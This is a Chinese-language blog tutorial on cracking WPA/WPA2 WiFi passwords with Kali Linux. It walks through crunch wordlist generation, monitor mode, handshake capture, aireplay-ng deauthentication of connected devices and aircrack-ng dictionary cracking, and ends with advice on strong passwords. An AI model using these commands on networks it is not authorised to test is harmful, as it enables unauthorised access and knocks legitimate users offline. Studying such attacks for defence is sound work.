Kali Linux使用Aircrack破解WiFi密码(wpa/wpa2)

注意:破解别人WiFi密码是违法的所以我用我自己家WiFi来测试,我们的目的是知道攻击的原理,来防范这种攻击。

设备需求:
安装kali Linux的计算机(不能用vmware虚拟机,虽然台式机可以用但太过麻烦不推荐,笔记本的虚拟机就算了)
支持监控模式的无线网卡,笔记本一般都支持。(这也是我不推荐用虚拟机的原因)
字典文件(这个可以现做现用,在知道一些线索后可以缩小范围,从而减少字典的大小和破解效率)
时间和耐心(这个和自己的字典大小和CPU有关)
如果用的是别的版本Linux可以下载katoolin工具箱这个我在Ubuntu16.04上用过,不过个别功能并不支持,在Ubuntu18.04上
修复了这些问题
×××kali 里自带rockyou字典不过只能破解常见密码这里我不做使用。

1)字典生成。

工欲善其事必先利其器,如果能5分钟破解WiFi的话我宁可4分钟在写字典。
在终端执行:crunch 8 8 bkrw489 -o ./cs/zd.txy
crunch:生成字典
第一个8 密码起始长度(就是最小位数)小提示:wifi密码最少8位
第二个8 密码结束长度(密码最大位数)
bkrw489 秘密中包含的字符
-o: 用于指定输出字典文件的位置。
./cs/ 文件路径
zd.txy 字典名称

不要妄想把所有小写字母和数字字典写出来,用上面最基本的写法生成出来的字典足足16tb,这只是为了展示这次实验编写的最简易的字典大小只有51.9mb如果设置特殊格式的话可以更小,但是没有必要。

2)开始准备

先断开wifi
在终端输入:airmon-ng 查看支持无线网卡监控模式的名称

上面列出了支持监控模式的无线网卡(在interface下面)如果没有任何输出表示无线网卡不支持监控模式或者无无线网卡。

3)开启无线网卡的监控模式

在终端输入:airmon-ng start wlan0

4)查看当前搜索范围的WiFi网络

在终端输入:airodump-ng wlan0mon
摁Ctrl+c结束搜索

5)抓取握手包

包含密码的包也叫握手包,有新用户链接或者有用户断开链接,或者有用户自动链接WiFi时就会发送握手包
开始抓包在终端运行:airodump-ng -c XX --bssid XX:XX:XX:XX:XX -w ./cs/ wlan0mon

-c指定频道号
–bissid 制定路由器的bissid
-w将抓取的包保存到指定位置

6)接下来是漫长的等待

也就是说我们要等用户重新链接或者断开我们要破解的wifi,这得看运气了运气不好会等很长一段时间。

7)不用等也可以因为我们还有别的办法

用aireplay-ng工具,他可以强制用户断开WiFi链接。
他的原理是给已经连接到WiFi的用户发送一个反认证包(deauth)让那个设备强行断开wifi,等一会儿后那个设备会自动链接,这样我们就能抓取握手包了。
不过此工具有瓶颈,用它时必须确保那个WiFi链接着至少一个设备。
保留监控终端在新终端运行:aireplay-ng -0 2 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0mon

-0表示发起攻击
-a制定无线路由器bssid就是我们要破解WiFi的那个路由器bssid
-c制定强制断开正在连着WiFi的设备
如果成功:右上角会显示
WPA handshake: XX:XX:XX:XX:XX:XX
摁Ctrl+c结束抓包并关闭无线网卡的监控模式
在终端输入:airmon-ng stop wlan0

8)开始破解密码

在终端输入:aircrack-ng -a2 -b XX:XX:XX:XX:XX:XX -w ./cs/zd.txy ./cs/*.cap
-a2代表wpa的握手包
-b制定要破解的WiFi bissid
-w制定要破解的字典文件(这里我生成的.txy文件也有.txt文件的格式)
./cs/*.cap这是最后抓取的包我给放在字典所在的文件夹了。

9)等待出结果吧是时候考验cpu真正的实力了


小提示:如果你的kali里面有显卡驱动和一块很好的显卡我建议你用gpu跑字典这样更快快这里暂不做介绍
总结:防止这种攻击简直简单的很如果对方没有做过工程,我可以很明确的告诉你8位密码里掺杂2个英文字母就很安全了,设置贼长贼复杂的密码是防御这种攻击最有效的手段!

你可能感兴趣的:(网络安全)